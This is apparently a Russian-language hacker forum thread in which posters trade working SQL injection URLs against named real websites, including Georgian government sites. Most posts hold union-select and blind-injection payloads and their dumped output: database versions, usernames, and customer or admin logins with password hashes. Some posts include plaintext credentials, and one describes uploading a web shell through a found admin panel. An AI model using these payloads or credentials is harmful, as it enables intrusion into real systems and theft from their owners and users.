www.president.gov.ge http://www.president.gov.ge/index.php?l=G&m=0&sm=3&id=2693+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/* 5.0.22-log president_gov_ge В таблице юзерс только один логин/пароль nino:fe3af9dcad7c5f65ae0e8a19ba6cb1f0(ni654) Админка: http://www.president.gov.ge/admin.php, но ацес дейнед-видимо лок по ип kolkhida.ge http://www.kolkhida.ge/rus/view_gancx.php?id=-7%27+union+select+1,2,3,4,5,6,7,8,9/* 4.1.20 test www.museum.ge http://www.museum.ge/web_page/index.php?id=-40+union+select+1,2,3,4,5,6,7,8,9 4.1.22-standard-log museumg_zaza
http://www.norma.com.ua/main_description.php?newsletters_id=1'+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT(customers_email_address,0x3a3a,customers_password)+FROM+customers+limit+32,1)),0x71),0x71),4,5,6/* Походу опять многократный хеш....
Code: http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/* Помогите плиз незнаю что дальше делать я просто только начинаю все осваивать и несовсем получается.
S0ulVortex вопросы по уязвимостям не сюда,дальше либо брут(если четвертая),либо вывод таблиц (если пятая) на сайте есть отличный фак! Читай!
вот, просмотрел немного бд. Version: 5.0.45-log User: [email protected] Database name: u13238 Database name: u13238_2 Database name: u13238_3 и кончилось терпение))
http://koshhejjka.sirenes.ru/index.php?d=22&p=-1+union+select+concat(name,0x3a3a,e_mail,0x3a3a,pass),2,3,4+from+tbl_artist+limit+1,10/* Косяковые гловы.... login: [email protected] pass: jxtymcnhfiyjtrbyj
http://perekrestok.ca/ http://perekrestok.ca/?page=countries&country_id=-1+union+select+1,2,unhex(hex(concat(login,0x3,password,0x3,email,0x3,icq))),4,5,6,7+from+users+limit+0,0-- 4.1.20inetlaba_perek@localhostinetlaba_perek Adminvan1238[email protected]111 Superadminvfhbzuelbyf[email protected] gendolfvfhbzuelbyf[email protected]
На этой же базе висит сайт: http://vozmi.ru ТИЦ: 130 PR: 4 Code: http://vozmi.ru/furniture/catalog.php?catalog=-97+union+select+user(),2,3/*
http://www.results.cec.gov.ge/ubnebi.php?district=22+and+1=@@version-- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
******************* ******************* Version:5.0.45-log3 user:[email protected] ничего интересного - сайт носит информационный характер --------------------------------------------------------------------- * User:root@localhost Version:5 Есть таблица db,копия mysql.user root:*2F69143FB5C4B18522CA1EC561E137AB9D3F9170 Не могу залить шелл,расскажете если кто-то зальет) а то я и так делал: и в HEX фигачил,все равно не помогло =(
Ахтунг! =) http://www.stayer.su/index.php?res=collection&cmd=view&id=-1+union+select+concat(login,0x3a3a,password,0x3a3a,name,0x3a3a3a3a)+from+users+limit+0,1/* Сначала пытался потыкать админовскими реквизитами в формочку авторизации на главной страничке сего чудного сайта. Не получилось. Хитрый администратор спрятал мою админку в http://www.stayer.su/adm Логинимся. Заливаем шел. Юзаем: тут был шел ...
http://bdigital.biz/index.php?pageid=214+AND+ascii(lower(substring(version(),1,1)))=51 version=3.*.*.*
http://www.avtobamper.ru/item_view.php?id=49&item_id=-1+union+select+1,2,3,Version(),5,user(),7,database(),9,10,11,12,13/* Можно чёнють седлать? Пытался нече неполучилось Вот ещё немагу найти админку, все нашол а админку нет http://www.good-food.ru/
http://hutro.com/index.php?pageid=15+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12-- hutro_hutro@localhost:hutro_hutro:4.1.22-standard-log http://hutro.com/index.php?pageid=15+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+0,1-- выдает: Code: SELECT * FROM aadm_menu WHERE id=15 union select 1,2,table_name,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 0,1--: SELECT command denied to user 'hutro_hutro'@'localhost' for table 'tables' Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/hutro/public_html/index.php on line 86
вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(version(),1,1)))=52-- version() = 4.*.*.* edited: http://www.amanda-nylons.com/index.php?pageID=' странно как-то -) order+by говорит что 1 колонка, а union+select+1 никак вообще. мож кто разберется.
http://biomac.ru/index.php?pageid=-117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
Сайт: www.blackratpress.co.uk PR=5 Админка: Логин и пароль админа: Пытался залить шелл, ничего не получлось, у кого получится отпостите...